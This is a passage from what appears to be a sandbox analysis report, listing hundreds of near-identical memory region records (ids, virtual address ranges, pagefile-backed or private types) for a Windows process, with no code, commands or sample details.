= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20336 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20337 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20338 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20339 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20340 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20341 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20342 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20343 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20344 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20345 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20346 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20347 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20348 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20349 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20350 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20351 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20352 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20353 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20354 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20355 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20356 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20357 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20358 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20359 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20360 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20361 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20362 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20398 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20399 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20400 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20401 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20402 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20403 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20404 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20405 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20406 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20407 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20408 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20409 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20410 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20411 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20412 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20413 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20414 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20415 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20416 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20417 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 20418 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 20419 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 20420 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 20421 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20422 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20423 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20424 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20425 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20426 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20427 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20428 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20429 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20430 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20431 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20432 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20433 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20434 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20435 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20436 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20437 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20438 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20439 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20440 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20441 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20442 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20443 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20444 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20445 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20446 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20447 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20448 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20449 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20450 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20451 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20452 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20453 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20454 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20455 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20456 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20457 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20458 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20459 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20460 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20461 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20462 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20463 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20464 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20465 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20466 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20467 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20468 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20469 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20470 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20552 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 20553 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 20554 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 20555 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 20556 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20557 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20558 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20559 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20560 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20561 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20562 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20563 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20564 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20565 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20566 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20567 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20568 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20569 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20570 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20571 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20572 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20573 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20574 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20575 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20576 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20577 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20578 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20579 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20580 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20581 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20582 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20583 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20584 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20585 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20586 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20587 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20589 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20590 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20591 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20592 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20593 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20594 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20595 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20596 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20597 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20598 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20599 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20600 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20601 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20602 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20603 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20604 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20605 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 20606 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 20607 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 20608 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 20609 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20610 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20611 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20612 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20613 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20614 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20615 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20616 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20617 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20618 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20619 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20620 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20621 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20622 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20623 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20624 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20625 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20626 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20627 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20628 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20629 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20640 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20641 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20642 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20643 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20644 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20645 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20646 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20647 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20648 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20649 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20650 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20651 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20652 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20653 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20654 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20655 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20656 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20657 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20658 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20659 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 